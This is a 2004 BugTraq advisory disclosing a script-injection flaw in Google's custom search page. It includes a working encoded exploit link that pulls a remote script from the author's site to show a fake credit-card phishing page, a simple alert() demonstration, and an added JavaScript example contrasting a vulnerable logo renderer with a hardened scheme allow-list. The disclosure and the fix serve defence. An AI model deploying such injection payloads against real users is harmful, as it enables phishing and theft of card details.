BugTraq
Google Script Insertion Exploit Oct 19 2004 04:38PM
Jim Ley (jim jibbering com)


Website: www.google.com

Description: Google's custom web search does not prevent JavaScript from being inserted into the URL of the image (the L: value of the cof parameter), allowing malicious users to modify the content of the Google page, enabling phishing attacks, silently stealing search terms/results/clicks, or modifying actual searches to always contain attacker-controlled results. With Google's trusted status, the risk is almost certainly high.

The exploit is easiest to produce through a custom Google search form, which are commonly seen, used and understood on the web, but it can also be triggered through a simple link; this one works in IE:

http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27

(This is an example of using the exploit for phishing: it changes the Google search page to a page informing the user that Google is now a chargeable service and that they should enter their credit card details to continue; these are then logged on my site and the user is returned to a working Google. Currently there is a confirm box warning the user before the form is submitted.)

This example only works in IE, but other UAs also execute the JavaScript; it is a Google vulnerability, not an IE one.

The exploit can be demonstrated more simply with the URL:

http://www.google.com/custom?cof=L:javascript:javascript:alert('EEK!')
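The pattern the advisory describes, as an added example that is not code from this post or from Google: a server-side renderer that drops the cof L: value straight into an <img src> attribute, beside a hardened version that parses the value with a real URL parser and allows only http and https. The ';'-separated KEY:VALUE layout of cof and the DEFAULT_LOGO fallback are assumptions made for illustration; the two cof values in the block are the percent-decoded forms of the advisory's own two links.

```javascript
// Added example, not code from the advisory or from Google. It shows the
// pattern the advisory describes (an attacker-supplied image URL dropped into
// the page) beside a hardened version that rejects non-http(s) schemes.
//
// Assumption: the cof query parameter is modelled here as a ';'-separated
// list of KEY:VALUE pairs, with L carrying the logo URL. That layout is an
// assumption for illustration; only "cof=L:<url>" is taken from the advisory.
// All functions take the already percent-decoded parameter value, as a web
// framework would hand it to the application.

// Decoded value of the hex-encoded cof parameter in the advisory's IE link.
const ADVISORY_COF =
  "L:javascript:javascript:document.appendChild(" +
  "document.createElement('script')).src='http://jibbering.com/test2.js'";

// Decoded value of the advisory's simpler demonstration link.
const SIMPLE_COF = "L:javascript:javascript:alert('EEK!')";

function parseCof(cof) {
  const fields = {};
  for (const pair of cof.split(';')) {
    const sep = pair.indexOf(':');        // split on the FIRST colon only, so
    if (sep < 0) continue;                // "L:http://x" keeps its scheme
    fields[pair.slice(0, sep)] = pair.slice(sep + 1);
  }
  return fields;
}

// Vulnerable: whatever followed "L:" becomes the src of the logo image.
// A javascript: URL here runs in the page's origin in browsers that honour
// script URLs in image sources (IE at the time), as the advisory shows.
function renderLogoVulnerable(cof) {
  const logo = parseCof(cof).L || '';
  return `<img src="${logo}">`;
}

// Hardened: parse with a real URL parser, allow only http/https, and use the
// parser's serialisation (not the raw input) in the attribute.
function safeLogoUrl(raw) {
  let url;
  try {
    url = new URL(raw);          // throws on relative or unparsable input
  } catch (e) {
    return null;
  }
  // Scheme allow-list. Deny-listing "javascript:" would miss data:, vbscript:
  // and the scheme obfuscations the parser normalises away (tabs, newlines,
  // leading whitespace), so allow-list instead.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return url.href;
}

function escapeAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Hypothetical fallback path used when the supplied logo is rejected.
const DEFAULT_LOGO = '/images/default_logo.gif';

function renderLogoHardened(cof) {
  const logo = safeLogoUrl(parseCof(cof).L || '');
  return `<img src="${escapeAttr(logo === null ? DEFAULT_LOGO : logo)}">`;
}

// Demonstration when run directly: node this_file.js
if (typeof require !== 'undefined' && require.main === module) {
  for (const cof of [SIMPLE_COF, ADVISORY_COF, 'L:http://example.com/logo.gif']) {
    console.log('vulnerable:', renderLogoVulnerable(cof));
    console.log('hardened:  ', renderLogoHardened(cof));
  }
}
```

Note that the hardened version rejects the whole value rather than trying to strip "javascript:" out of it: the doubled "javascript:javascript:" prefix in the advisory's links is exactly the kind of input that defeats a one-pass strip, and a scheme allow-list on the parsed URL needs no such guessing.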

The exploit has been public for over two years, and Google has been informed on multiple occasions.

More information, and another example exploit, at
http://jibbering.com/2004/10/google.html

Jim Ley.
http://jibbering.com/
